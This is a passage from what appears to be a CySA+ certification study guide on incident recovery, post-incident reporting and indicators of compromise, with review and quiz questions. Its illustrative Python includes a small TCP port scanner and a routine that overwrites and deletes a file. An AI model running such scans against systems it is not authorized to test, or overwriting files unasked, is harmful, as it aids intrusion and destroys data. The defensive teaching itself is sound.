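As a minimal sketch of this technique (the file paths and the baseline file are hypothetical), you could record SHA-256 hashes of sensitive files before an incident and compare them afterward using only the Python standard library:

import hashlib
import json
from pathlib import Path

def sha256_of(path):
    """Hash a file in chunks so large files do not exhaust memory."""
    digest = hashlib.sha256()
    with Path(path).open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

# Baseline recorded before the incident (hypothetical file of name-to-hash pairs).
baseline = json.loads(Path("hash_baseline.json").read_text())

# After the incident, flag any file whose hash no longer matches the baseline.
for name, known_hash in baseline.items():
    if sha256_of(name) != known_hash:
        print(f"INTEGRITY ALERT: {name} has changed")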
Economic
The economic impact of an incident is driven mainly by the
value of the assets involved. Determining those values can be
difficult, especially for intangible assets such as plans, designs,
and recipes. Tangible assets include computers, facilities,
supplies, and personnel. Intangible assets include intellectual
property, data, and organizational reputation. The value of an
asset should be considered with respect to the asset owner’s
view. The following considerations can be used to determine an
asset’s value:
Value to owner
Work required to develop or obtain the asset
Costs to maintain the asset
Damage that would result if the asset were lost
Cost that competitors would pay for the asset
Penalties that would result if the asset were lost
After determining the value of assets, you should determine the
vulnerabilities and threats to each asset.
System Process Criticality
Some assets are not actually information but systems that
provide access to information. When these systems or groups of
systems provide access to data required to continue to do
business, they are called critical systems. While it is somewhat
simpler to arrive at a value for physical assets such as servers,
routers, switches, and other devices, in cases where these
systems provide access to critical data or are required to
continue a business-critical process, their value is more than the
replacement cost of the hardware. The assigned value should be
increased to reflect its importance in providing access to data or
its role in continuing a critical process.
Reverse Engineering
Reverse engineering can refer to retracing the steps in an
incident, as seen from the logs in the affected devices or in logs
of infrastructure devices that may have been involved in
transferring information to and from the devices. This can help
you understand the sequence of events. When unknown
malware is involved, the term reverse engineering may refer to
an analysis of the malware’s actions to determine a removal
technique. This is the approach to zero-day attacks in which no
known fix is yet available from anti-malware vendors. With
respect to reverse engineering malware, this process refers to
extracting the code from the binary executable to identify how it
was programmed and what it does. There are three ways the
binary malware file can be made readable (a short disassembly illustration follows this list):
Disassembly: This refers to reading the machine code into
memory and then outputting each instruction as a text string.
Analyzing this output requires a very high level of skill and special
software tools.
Decompiling: This process attempts to reconstruct the high-level
language source code.
Debugging: This process steps through the code interactively.
There are two kinds of debuggers:
Kernel debugger: This type of debugger operates at ring 0
(essentially the driver level) and has direct access to the kernel.
Usermode debugger: This type of debugger has access to only
the usermode space of the operating system. Most of the time,
this is enough, but not always. In the case of rootkits or even
super-advanced protection schemes, it is preferable to switch to
a kernel-mode debugger because user mode in such situations is
untrustworthy.
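As a small hands-on illustration of the disassembly concept (at the Python bytecode level rather than native machine code), the standard library's dis module reads compiled instructions and outputs each one as a text string:

import dis

def add(a, b):
    return a + b

# Print each bytecode instruction of add() in human-readable form.
dis.dis(add)

Native disassemblers work the same way in principle, just against machine code instead of bytecode, which is why analyzing their output demands far more skill.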
Data Correlation
Data correlation is the process of locating variables in the
information that seem to be related. For example, you might
notice that every time there is a spike in SYN packets, a DoS
attack follows. Applying this process to the data in device
security logs reveals correlations that point to issues and
attacks. A good example of such a system is a
security information and event management (SIEM) system. These
systems collect the logs, analyze the logs, and, through the use
of aggregation and correlation, help you identify attacks and
trends. SIEM systems are covered in more detail in Chapter 11,
“Analyzing Data as Part of Security Monitoring Activities.”
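A SIEM system does this at scale, but the core idea can be sketched simply. The following Python sketch (the per-minute SYN counts, alert times, and thresholds are all hypothetical) flags minutes in which a SYN spike coincides with an IDS alert:

# Hypothetical per-minute SYN packet counts and IDS alert times (minute index).
syn_counts = {0: 120, 1: 135, 2: 4200, 3: 130, 4: 3900}
ids_alerts = {2, 4}

baseline = 150     # assumed normal SYN packets per minute
spike_factor = 10  # treat 10x the baseline as a spike

spikes = {m for m, count in syn_counts.items() if count > baseline * spike_factor}
print("Correlated minutes:", sorted(spikes & ids_alerts))  # [2, 4]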
CONTAINMENT
Just as the first step when an injury occurs is to stop the
bleeding, after a security incident occurs, the first priority is to
contain the threat to minimize the damage. There are a number
of containment techniques. Not all of them are available to you
or advisable in all situations. One of the benefits of proper
containment is that it gives you time to develop a good
remediation strategy.
Segmentation
The segmentation process involves limiting the scope of an
incident by leveraging existing segments of the network as
barriers to prevent the spread to other segments. These
segments could be defined at either Layer 3 or Layer 2 of the
OSI reference model.
When you segment at Layer 3, you are creating barriers based
on IP subnets. These are either physical LANs or VLANs.
Creating barriers at this level involves deploying access control
lists (ACLs) on the routers to prevent traffic from moving from
one subnet to another. While it is possible to simply shut down
a router interface, in some scenarios that is not advisable
because the interface is used to reach more subnets than the one
where the threat exists.
Segmenting at Layer 2 can be done in several ways:
You can create VLANs, which create segmentation at both Layer 2
and Layer 3.
You can create private VLANs (PVLANs), which segment an
existing VLAN at Layer 2.
You can use port security to isolate a device at Layer 2 without
removing it from the network.
In some cases, it might be advisable to use segmentation at the
perimeter of the network (for example, stopping the outbound
communication from an infected machine or blocking inbound
traffic).
Isolation
Isolation typically is implemented by either blocking all traffic
to and from a device or devices or by shutting down device
interfaces. This approach works well for a single compromised
system but becomes cumbersome when multiple devices are
involved. In that case, segmentation may be a more advisable
approach. If a new device can be set up to perform the role of
the compromised device, the team may leave the device running
to analyze the end result of the threat on the isolated host.
Another form of isolation, process isolation, is a technique
whereby all processes (work being performed by the processor)
are executed using memory dedicated to each process. This
prevents processes from accessing the memory of other
processes, which can help to mitigate attacks that do so.
ERADICATION AND RECOVERY
After the threat has been contained, the next step is to remove
or eradicate the threat. In some cases the compromised device
can be cleaned without a format of the hard drive, while in
many other cases this must be done to completely remove the
threat. This section looks at some removal approaches.
Vulnerability Mitigation
Once the specific vulnerability has been identified, it must be
mitigated. This mitigation will in large part be driven by the
type of issue with which you are presented. In some cases the
proper response will be to format the hard drive of the affected
system and reimage it. In other cases the mitigation may be a
change in policies, when a weakness is revealed that results
from the way the organization operates. Let’s look at some
common mitigations.
Sanitization
Sanitization refers to removing all traces of a threat by
overwriting the drive multiple times to ensure that the threat is
removed. This works well for mechanical hard disk drives, but
solid-state drives present a challenge in that overwriting cannot
be guaranteed to reach every cell because of wear leveling. Most
solid-state drive vendors provide sanitization
commands that can be used to erase the data on the drive.
Security professionals should research these commands to
ensure that they are effective.
Note
NIST Special Publication 800-88 Rev. 1 is an example of a government
guideline for proper media sanitization, as are the IRS guidelines for proper
media sanitization:
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-88r1.pdf
https://www.irs.gov/privacy-disclosure/media-sanitization-guidelines
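To illustrate the overwriting idea at file granularity (this is a teaching sketch, not a substitute for the vendor commands or the NIST guidance above; the file path is hypothetical), the following Python sketch overwrites a file with random bytes several times before deleting it:

import os
from pathlib import Path

def overwrite_and_delete(path, passes=3):
    """Overwrite a file with random bytes several times, then delete it.
    Caution: on SSDs and journaling filesystems this does NOT guarantee erasure."""
    target = Path(path)
    size = target.stat().st_size
    with target.open("r+b") as f:
        for _ in range(passes):
            f.seek(0)
            f.write(os.urandom(size))
            f.flush()
            os.fsync(f.fileno())
    target.unlink()

overwrite_and_delete("suspect_artifact.bin")  # hypothetical file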
Reconstruction/Reimaging
Once a device has been sanitized, the system must be rebuilt.
This can be done by reinstalling the operating system, applying
all system updates, reinstalling the anti-malware software, and
implementing any organization security settings. Then, any
needed applications must be installed and configured. If the
device is a server that is running some service on behalf of the
network (for example, DNS or DHCP), that service must be
reconfigured as well. All this is not only a lot of work, it is time-consuming. A better approach is to maintain standard images of
the various device types in the network so that you can use these
images to stand up a device quickly. To make this approach
even more seamless, maintaining a backup image of the specific
device eliminates the reconfiguration that a generic standard
image would still require.
Secure Disposal
In some instances, you may decide to dispose of a compromised
device (or its storage drive) rather than attempt to sanitize and
reuse the device. In that case, you want to dispose of it in a
secure manner. In the case of secure disposal, an organization
must consider certain issues, including the following:
Does removal or replacement introduce any security holes in the
network?
How can the system be terminated in an orderly fashion to avoid
disrupting business continuity?
How should any residual data left on any systems be removed?
Are there any legal or regulatory issues that would guide the
destruction of data?
Whenever data is erased or removed from storage media,
residual data can be left behind. This can allow data to be
reconstructed when the organization disposes of the media, and
unauthorized individuals or groups may be able to gain access
to the data. When considering data remanence, security
professionals must understand three countermeasures:
Clearing: Clearing includes removing data from the media so that
it cannot be reconstructed using normal file recovery techniques
and tools. With this method, the data is recoverable only using
special forensic techniques.
Purging: Also referred to as sanitization, purging makes the data
unreadable even with advanced forensic techniques. With this
technique, data should be unrecoverable.
Destruction: Destruction involves destroying the media on which
the data resides. Degaussing, another destruction technique,
exposes the media to a powerful, alternating magnetic field,
removing any previously written data and leaving the media in a
magnetically randomized (blank) state. Physical destruction
involves physically breaking the media apart or chemically altering
it.
Patching
In many cases, a threat or an attack is made possible by missing
security patches. You should update or at least check for
updates for a variety of components. This includes all patches
for the operating system, updates for any applications that are
running, and updates to all anti-malware software that is
installed. While you are at it, check for any firmware update the
device may require. This is especially true of hardware security
devices such as firewalls, IDSs, and IPSs. If any routers or
switches are compromised, check for software and firmware
updates.
Restoration of Permissions
Many times an attacker compromises a device by altering the
permissions, either in the local database or in entries related to
the device in the directory service server. All permissions should
undergo a review to ensure that all are in the appropriate state.
The appropriate state may not be the state they were in before
the event. Sometimes you may discover that although
permissions were not set in a dangerous way prior to an event,
they are not correct. Make sure to check the configuration
database to ensure that settings match prescribed settings. You
should also make changes to the permissions based on lessons
learned during an event. In that case, ensure that the new
settings undergo a change control review and that any approved
changes are reflected in the configuration database.
Reconstitution of Resources
In many incidents, resources may be deleted or stolen. In other
cases, the process of sanitizing the device causes the loss of
information resources. These resources should be recovered
from backup. One key process that can minimize data loss is to
shorten the time between backups for critical resources. This
results in a recovery point objective (RPO) that includes more
recent data. RPO is discussed in more detail earlier in this
chapter.
Restoration of Capabilities and Services
During the incident response, it might be necessary to disrupt
some of the normal business processes to help contain the issue
or to assist in remediation. It is also possible that the attack has
rendered some services and capabilities unavailable. Once an
effective response has been mounted, these systems and
services must be restored to full functionality. Just as shortening
the backup interval can help to reduce the effects of data loss,
fault-tolerant measures can be effective in preventing the loss of
critical services.
Verification of Logging/Communication to Security
Monitoring
To ensure that you will have good security data going forward,
you need to ensure that all logs related to security are collecting
data. Pay special attention to the manner in which the logs react
when full. With some settings, the log begins to overwrite older
entries with new entries. With other settings, the service stops
collecting events when the log is full. Security log entries need to
be preserved. This may require manual archiving of the logs and
subsequent clearing of the logs. Some logs make this possible
automatically, whereas others require a script. If all else fails,
check the log often to assess its state.
Many organizations send all security logs to a central location.
This could be a Syslog server, or it could be a SIEM system.
These systems not only collect all the logs, they use the
information to make inferences about possible attacks. Having
access to all logs allows the system to correlate all the data from
all responding devices.
Regardless of whether you are logging to a Syslog server or a
SIEM system, you should verify that all communications
between the devices and the central server are occurring
without a hitch. This is especially true if you had to rebuild the
system manually rather than restore from an image, as there
would be more opportunity for human error in the rebuilding of
the device.
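One simple end-to-end check (the collector address and message contents are hypothetical) is to emit a uniquely identifiable test event through the Python standard library's syslog handler and then confirm it arrives at the central server:

import logging
import logging.handlers

# Hypothetical central collector; substitute your Syslog server or SIEM address.
handler = logging.handlers.SysLogHandler(address=("syslog.example.com", 514))
logger = logging.getLogger("ir-verification")
logger.addHandler(handler)
logger.setLevel(logging.INFO)

# Send a test message with a unique marker, then search for the marker on the collector.
logger.info("IR-REBUILD-CHECK host=web01 logging-path verification")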
POST-INCIDENT ACTIVITIES
Once the incident has been contained and removed and the
recovery process is complete, there is still work to be done.
Much of it, as you might expect, is paperwork, but this
paperwork is critical to enhancing the response to the next
incident. Let’s look at some of these post-incident activities that
should take place.
Evidence Retention
If the incident involved a security breach and the incident
response process gathered evidence to prove an illegal act or a
violation of policy, the evidence must be stored securely until it
is presented in court or is used to confront the violating
employee. Computer investigations require different procedures
than regular investigations because the time frame for the
computer investigator is compressed, and an expert might be
required to assist in the investigation. Also, computer
information is intangible and often requires extra care to ensure
that the data is retained in its original format. Finally, the
evidence in a computer crime is difficult to gather.
After a decision has been made to investigate a computer crime,
you should follow standardized procedures, including the
following:
Identify what type of system is to be seized.
Identify the search and seizure team members.
Determine the risk of the suspect destroying evidence.
After law enforcement has been informed of a computer crime,
the constraints on the organization’s investigator are increased.
Turning over an investigation to law enforcement to ensure that
evidence is preserved properly might be necessary.
When investigating a computer crime, evidentiary rules must be
addressed. Computer evidence should prove a fact that is
material to the case and must be reliable. The chain of custody
must be maintained. Computer evidence is less likely to be
admitted in court as evidence if the process for producing it is
not documented.
Lessons Learned Report
The first document that should be drafted is a lessons
learned report, which briefly lists and discusses what was
learned about how and why the incident occurred and how to
prevent it from occurring again. This report should be compiled
during a formal meeting shortly after recovery from the
incident. This report provides valuable information that can be
used to drive improvement in the security posture of the
organization. This report might answer questions such as the
following:
What went right, and what went wrong?
How can we improve?
What needs to be changed?
What was the cost of the incident?
Change Control Process
The lessons learned report may generate a number of changes
that should be made to the network infrastructure. All these
changes, regardless of how necessary they are, should go
through the standard change control process. They should be
submitted to the change control board, examined for
unforeseen consequences, and studied for proper integration
into the current environment. Only after gaining approval
should they be implemented. You may find it helpful to create a
“fast track” for assessment in your change management system
for changes such as these when time is of the essence. For more
details regarding change control processes, refer to Chapter 8,
“Security Solutions for Infrastructure Management.”
Incident Response Plan Update
The lessons learned exercise may also uncover flaws in your IR
plan. If this is the case, you should update the plan
appropriately to reflect the needed procedure changes. When
this is complete, ensure that all software and hard copy versions
of the plan have been updated so everyone is working from the
same document when the next event occurs.
Incident Summary Report
All stakeholders should receive a document that summarizes the
incident. It should not have an excessive amount of highly
technical language in it, and it should be written so
nontechnical readers can understand the major points of the
incident. The following are some of the highlights that should be
included in an incident summary report:
When the problem was first detected and by whom
The scope of the incident
How it was contained and eradicated
Work performed during recovery
Areas where the response was effective
Areas that need improvement
Indicator of Compromise (IoC) Generation
Indicators of compromise (IoCs) are behaviors and
activities that precede or accompany a security incident. In
Chapter 17, “Analyzing Potential Indicators of Compromise,”
you will learn what some of these indicators are and what they
may tell you. You should always record or generate the IoCs
that you find related to the incident. This information may be
used to detect the same sort of incident later, before it advances
to the point of a breach.
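The objective does not prescribe a format, but recording IoCs in a simple structured form makes them reusable by monitoring tools later. A minimal Python sketch (every field and value here is hypothetical; the IP address uses a documentation range):

import json
from datetime import datetime, timezone

ioc_record = {
    "incident_id": "INC-1234",  # hypothetical ticket number
    "generated": datetime.now(timezone.utc).isoformat(),
    "indicators": [
        {"type": "ipv4", "value": "203.0.113.45", "context": "beacon destination"},
        {"type": "domain", "value": "updates.example.net", "context": "C2 lookup"},
    ],
}

# Write the record so detection tools and analysts can consume it later.
with open("incident_iocs.json", "w") as f:
    json.dump(ioc_record, f, indent=2)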
Monitoring
As previously discussed, it is important to ensure that all
security surveillance tools (IDS, IPS, SIEM, firewalls) are back
online and recording activities and reporting as they should be,
as discussed in Chapter 11. Moreover, even after you have taken
all steps described thus far, consider using a vulnerability
scanner to scan the devices or the network of devices that were
affected. Make sure before you do so that you have updated the
scanner so it can recognize the latest vulnerabilities and threats.
This will help catch any lingering vulnerabilities that may still
be present.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 16-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 16-2 Key Topics for Chapter 16
Key Topic Element
Description
Page Number
Figure 16-1
Incident response process
453
Bulleted list
Key incident forms
454
Bulleted list
Recovery terminology
455
Bulleted list
Criticality levels
456
Bulleted list
Asset value considerations
456
Bulleted list
Reverse engineering techniques
457
Bulleted list
Segmenting at Layer 2
459
Bulleted list
Disposal considerations
460
Bulleted list
Data removal methods
461
Bulleted list
Lessons learned considerations
464
Bulleted list
Incident summary report considerations
464
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
incident form
call list/escalation list
scope
maximum tolerable downtime (MTD)
mean time to repair (MTTR)
mean time between failures (MTBF)
recovery time objective (RTO)
work recovery time (WRT)
recovery point objective (RPO)
reverse engineering
disassembly
decompiling
debugging
kernel debugger
usermode debugger
data correlation
segmentation
isolation
sanitization
clearing
purging
destruction
lessons learned report
incident summary report
indicator of compromise (IoC)
REVIEW QUESTIONS
1. When security incidents occur, the quality of the response is
directly related to the amount and quality of the
____________.
2. List the steps, in order, of the incident response process.
3. Match the following terms with their definitions.
Terms
Definitions
Maximum tolerable downtime (MTD)
The estimated amount of time a device will operate before a failure occurs
Mean time to repair (MTTR)
The shortest time period after a disaster or disruptive event within which a resource or function must be restored in order to avoid unacceptable consequences
Mean time between failures (MTBF)
The maximum amount of time that an organization can tolerate a single resource or function being down
Recovery time objective (RTO)
The average time required to repair a single resource or function
4. ____________________ involves eliminating any
residual danger or damage to the network that still might
exist.
5. List at least two considerations that can be used to
determine an asset’s value.
6. Match the following terms with their definitions.
Terms
Definitions
Segmentation
Making the data unreadable even with advanced forensic techniques
Sanitization
Removing data from the media so that it cannot be reconstructed using normal file recovery techniques and tools
Clearing
Removing all traces of a threat by overwriting the drive multiple times
Purging
Limiting the scope of an incident by leveraging existing segments of the network as barriers to prevent the spread to other segments
7. The _______________________ should indicate under
what circumstance individuals should be contacted to avoid
unnecessary alerts and to keep the process moving in an
organized manner.
8. List at least one way the binary malware file can be made
readable.
9. Match the following terms with their definitions.
Terms
Definitions
Disassembly
Retracing the steps in an incident, as seen from the logs
Reverse engineering
Process that attempts to reconstruct the high-level language source code
Debugging
Steps through the code interactively
Decompiling
Reading the machine code into memory and then outputting each instruction as a text string
10. ______________________ are behaviors and activities
that precede or accompany a security incident.
Chapter 17
Analyzing Potential
Indicators of Compromise
This chapter covers the following topics related to Objective 4.3
(Given an incident, analyze potential indicators of compromise)
of the CompTIA Cybersecurity Analyst (CySA+) CS0-002
certification exam:
Network-related indicators of compromise: Includes
bandwidth consumption, beaconing, irregular peer-to-peer
communication, rogue device on the network, scan/sweep, unusual
traffic spike, and common protocol over non-standard port.
Host-related indicators of compromise: Covers processor
consumption, memory consumption, drive capacity consumption,
unauthorized software, malicious process, unauthorized change,
unauthorized privilege, data exfiltration, abnormal OS process
behavior, file system change or anomaly, registry change or
anomaly, and unauthorized scheduled task.
Application-related indicators of compromise: Includes
anomalous activity, introduction of new accounts, unexpected
output, unexpected outbound communication, service interruption,
and application log.
Indicators of compromise (IOCs) are somewhat like clues
left at the scene of a crime except they also include clues that
preceded the crime. IOCs help us to anticipate security issues
and also to reconstruct the process that was taken to cause the
security issue or breach. This chapter examines some common
IOCs and what they might indicate.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these nine self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
Table 17-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 17-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Questions
Network-Related Indicators of Compromise
1, 2, 3
Host-Related Indicators of Compromise
4, 5, 6
Application-Related Indicators of Compromise
7, 8, 9
1. Which of the following IoCs is most likely from a DoS
attack?
1. Beaconing
2. Irregular peer-to-peer communication
3. Bandwidth consumption
4. Rogue device on the network
2. Which of the following IoCs is most likely an indication of a
botnet?
1. Beaconing
2. Irregular peer-to-peer communication
3. Bandwidth consumption
4. Rogue device on the network
3. Which of the following is used to locate live devices?
1. Ping sweep
2. Port scan
3. Pen test
4. Vulnerability test
4. Which of the following metrics cannot be found in Windows
Task Manager?
1. Memory consumption
2. Drive capacity consumption
3. Processor consumption
4. Unauthorized software
5. Which of the following utilities is a freeware task manager
that offers more functionality than Windows Task Manager?
1. System Information
2. Process Explorer
3. Control Panel
4. Performance
6. Which of the following is a utility built into the Windows 10
operating system that checks for system file corruption?
1. TripWire
2. System File Checker
3. sigver
4. SIEM
7. Which of the following might be an indication of a
backdoor?
1. Introduction of new accounts
2. Unexpected output
3. Unexpected outbound communication
4. Anomalous activity
8. Within which of the following tools is the Application log
found?
1. Event Viewer
2. Performance
3. System Information
4. App Locker
9. Which of the following is not an application-related IoC?
1. Introduction of new accounts
2. Unexpected output
3. Unexpected outbound communication
4. Beaconing
FOUNDATION TOPICS
NETWORK-RELATED INDICATORS OF
COMPROMISE
Security analysts, regardless of whether they are operating in
the role of first responder or in a supporting role analyzing
issues, should be aware of common indicators of compromise.
Moreover, they should be aware of the types of incidents
implied by each IOC. This can lead to a quicker and correct
choice of action when time is of the essence. It is helpful to
examine these IOCs in relation to the component that is
displaying the IOC.
Certain types of network activity are potential indicators of
security issues. The following sections describe the most
common of the many network-related symptoms.
Bandwidth Consumption
Whenever bandwidth usage is above normal and there is no
known legitimate activity generating the traffic, you should
suspect security issues that generate unusual amounts of traffic,
such as denial-of-service (DoS) or distributed denial-of-service
(DDoS) attacks. For this reason, benchmarks should be created
for normal bandwidth usage at various times during the day.
Then alerts can be set when activity rises by a specified
percentage at those various times. Many free network
bandwidth monitoring tools are available. Among them are
BitMeter OS, FreeMeter Bandwidth Monitor, BandwidthD, and
PRTG Network Monitor. Anomaly-based intrusion detection
systems can also “learn” normal traffic patterns and can set off
alerts when unusual traffic is detected. Figure 17-1 shows an
example of setting an alert in BitMeter.
Figure 17-1 Setting an Alert in BitMeter
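The same threshold logic is easy to script against whatever counters your monitoring exports. A minimal Python sketch (the baseline table and the 20 percent threshold are hypothetical):

# Hypothetical baseline of normal bandwidth (Mbps) for selected hours of the day.
baseline_mbps = {9: 180, 10: 220, 11: 240}
ALERT_PCT = 20  # alert when usage exceeds the baseline by 20 percent

def check_bandwidth(hour, current_mbps):
    allowed = baseline_mbps[hour] * (1 + ALERT_PCT / 100)
    if current_mbps > allowed:
        print(f"ALERT: {current_mbps} Mbps at hour {hour} exceeds {allowed:.0f} Mbps")

check_bandwidth(10, 410)  # prints: ALERT: 410 Mbps at hour 10 exceeds 264 Mbps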
Beaconing
Beaconing refers to traffic that leaves a network at regular
intervals. This type of traffic could be generated by
compromised hosts that are attempting to communicate with
(or call home to) the malicious party that compromised the host.
While there are security products that can identify beacons,
including firewalls, intrusion detection systems, web proxies,
and SIEM systems, creating and maintaining baselines of
activity will help you identify beacons that are occurring during
times of no activity (for example, at night). When this type of
traffic is detected, you should search the local source device for
scripts that may be generating these calls home.
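Beacons stand out because the spacing between connections is unusually regular. A minimal Python sketch (the connection timestamps and the 5 percent tolerance are hypothetical) that flags near-constant intervals from one host to one destination:

from statistics import mean, pstdev

# Hypothetical outbound connection times, in seconds, from one host to one destination.
timestamps = [0, 300, 600, 901, 1200, 1499]

intervals = [b - a for a, b in zip(timestamps, timestamps[1:])]
avg, spread = mean(intervals), pstdev(intervals)

# Near-constant spacing (spread tiny relative to the average) suggests beaconing.
if spread < 0.05 * avg:
    print(f"Possible beacon: ~{avg:.0f}s interval, spread {spread:.1f}s")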
Irregular Peer-to-Peer Communication
Some traffic between peers within a network is normal, but
irregular peer-to-peer (P2P) communication may indicate a
security issue. At the very least, illegal file sharing could be
occurring; at worst, the P2P communication could be the work
of a botnet. Peer-to-peer
botnets differ from normal botnets in their structure and
operation. Figure 17-2 shows the structure of a traditional
botnet. In this scenario, all the zombies communicate directly
with the command and control server, which is located outside
the network. The limitation of this arrangement and the issue
that gives rise to peer-to-peer botnets is that devices that are
behind a NAT server or proxy server cannot participate. Only
devices that can be reached externally can do so.
Figure 17-2 Traditional Botnet
In a peer-to-peer botnet, devices that can be reached
externally are compromised and run server software that turns
them into command and control servers for the devices that are
recruited internally that cannot communicate with the
command and control server operating externally. Figure 17-3
shows this arrangement.
Figure 17-3 Peer-to-Peer Botnet
Regardless of whether peer-to-peer traffic is used as part of a
botnet or simply as a method of file sharing, it presents the
following security issues:
The spread of malicious code that may be shared along with the file
Inadvertent exposure of sensitive material located in unsecured
directories
Actions taken by the P2P application that make a device more prone
to attack, such as opening ports
Network DoS attacks created by large downloads
Potential liability from pirated intellectual property
Because of the dangers, many organizations choose to prohibit
the use of P2P applications and block common port numbers
used by these applications at the firewall. Another helpful
remediation is to keep all anti-malware software up to date in
case malware is transmitted by the use of P2P applications.
Rogue Device on the Network
Any time new devices appear on a network, there should be
cause for suspicion. While it is possible that users may be
introducing these devices innocently, there are also a number of
bad reasons for these devices to be on the network. The
following types of illegitimate devices may be found on a
network:
Wireless key loggers: These collect information and transmit it
to the criminal via Bluetooth or Wi-Fi.
Wi-Fi and Bluetooth hacking gear: This gear is designed to
capture both Bluetooth and Wi-Fi transmissions.
Rogue access points: Rogue APs are designed to lure your hosts
into a connection for a peer-to-peer attack.
Rogue switches: These switches can attempt to create a trunk
link with a legitimate switch, thus providing access to all VLANs.
Mobile hacking gear: This gear allows a malicious individual to
use software along with software-defined radios to trick cell phone
users into routing connections through a fake cell tower.
The actions required to detect or prevent rogue devices
depend on the type of device. With respect to rogue switches,
ensure that all ports that are required to be trunks are “hard
coded” as trunks and that Dynamic Trunking Protocol (DTP) is
disabled on all switch ports.
With respect to rogue wireless access points, the best solution is
a wireless intrusion prevention system (WIPS). These
systems can not only alert you when any unknown device is in
the area (APs and stations) but can take a number of actions to
prevent security issues, including the following:
Locate a rogue AP by using triangulation when three or more
sensors are present
Deauthenticate any stations that have connected to an “evil twin”
Detect denial-of-service attacks
Detect man-in-the-middle and client-impersonation attacks
Some examples of these tools include Mojo Networks AirTight
WIPS, HP RFProtect, Cisco Adaptive Wireless IPS, Fluke
Networks AirMagnet Enterprise, HP Mobility Security IDS/IPS,
and Zebra Technologies AirDefense.
Scan/Sweep
One of the early steps in a penetration test is to scan or sweep
the network. If no known penetration test is underway but a
scan or sweep is occurring, it is an indication that a malicious
individual may be scanning in preparation for an attack. The
following are the most common of these scans (a minimal sketch of the underlying mechanics follows the list):
Ping sweeps: Also known as ICMP sweeps, ping sweeps use ICMP
to identify all live hosts by pinging all IP addresses in the known
network. All devices that answer are up and running.
Port scans: Once all live hosts are identified, a port scan attempts
to connect to every port on each device and report which ports are
open, or “listening.”
Vulnerability scans: Vulnerability scans are more
comprehensive than the other types of scans in that they identify
open ports and security weaknesses. The good news is that
uncredentialed scans expose less information than credentialed
scans. An uncredentialed scan is a scan in which the scanner
lacks administrative privileges on the device it is scanning.
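For reference, the core of a port scan is nothing more than a connection attempt per port. A minimal Python sketch using only the standard library (the target address is a documentation-range placeholder; scan only systems you are authorized to test):

import socket

target = "192.0.2.10"  # hypothetical host; use only with authorization

for port in (22, 80, 443, 3389):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(0.5)
        # connect_ex() returns 0 when the port accepts the connection ("listening").
        if s.connect_ex((target, port)) == 0:
            print(f"Port {port} open")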
Unusual Traffic Spike
Any unusual spikes in traffic that are not expected should be
cause for alarm. Just as an increase in bandwidth usage may
indicate DoS or DDoS activity, unusual spikes in traffic may also
indicate this type of activity. Again, know what your traffic
patterns are and create a baseline of this traffic rhythm. With
traffic spikes, there are usually accompanying symptoms such
as network slowness and, potentially, alarms from any IPSs or
IDSs you have deployed.
Keep in mind that there are other legitimate reasons for traffic
spikes. The following are some of the normal activities that can
cause these spikes:
Backup traffic in the LAN
Virus scanner updates
Operating system updates
Mail server issues
Common Protocol over Non-standard Port
Common protocols such as FTP, SMTP, and SNMP use default
port numbers that have been standardized. However, it is
possible to run these protocols over different port numbers.
Whenever you discover this being done, you should treat the
transmission with suspicion because often there is no reason to
use a non-standard port unless you are trying to obscure what
you are doing. It also is a way of evading ACLs that prevent
traffic on the default standard ports. Be aware, though, that
running a common protocol over a non-standard port also is
used legitimately to prevent DoS attacks on default standard
ports by shifting a well-known service to a non-standard port
number. So, it is a technique used by both sides.
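As a hedged illustration (the interface and port are placeholders), printing the ASCII payload of traffic on an unexpected port with tcpdump can quickly reveal which protocol is actually running there:

tcpdump -i eth0 -A 'tcp port 8081'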
HOST-RELATED INDICATORS OF
COMPROMISE
While many indicators of compromise are network related,
some are indications that something is wrong at the system or
host level. These are behaviors of a single system or host rather
than network symptoms.
Processor Consumption
When the processor is very busy with very little or nothing
running to generate the activity, it could be a sign that the
processor is working on behalf of malicious software. Processor
consumption was covered in Chapter 13, “The Importance of
Proactive Threat Hunting.”
Memory Consumption
Another key indicator of a compromised host is increased
memory consumption. Memory consumption was also covered
in Chapter 13.
Drive Capacity Consumption
Available disk space on the host decreasing for no apparent
reason is cause for concern. It could be that the host is storing
information to be transmitted at a later time. Some malware has
the opposite effect, deleting files and producing an unexplained
increase in available drive space. Finally, in some cases, the
purpose is to fill the drive as part of a DoS or DDoS attack. One
of the difficult aspects of this is that the drive is typically filled
with hidden files. When users report a sudden filling of their hard
drive, or even a slow buildup over time that cannot be
accounted for, scan the device for malware in Safe Mode.
Scanning with multiple products is advised as well.
Unauthorized Software
The presence of any unauthorized software should be
another red flag. If you have invested in a vulnerability scanner,
you can use it to create a list of installed software that can be
compared to a list of authorized software. Unfortunately, many
types of malware do a great job of escaping detection.
One of the ways to prevent unauthorized software is through the
use of Windows AppLocker. By using this tool, you can create
whitelists, which specify the only applications that are allowed,
or you can create a blacklist, specifying which applications
cannot be run.
Figure 17-4 shows a Windows AppLocker rule being created.
This particular rule is based on the path to the application, but
it could also be based on the publisher of the application or on a
hash value of the application file. This particular rule is set to
allow the application in the path, but it could also be set to deny
that application. Once the policy is created, it can be applied as
widely as desired in the Active Directory infrastructure.
Figure 17-4 Create Executable Rules
The following are additional general guidelines for preventing
unwanted software:
Keep the granting of administrative privileges to a minimum.
Audit the presence and use of applications. (AppLocker can do
this.)
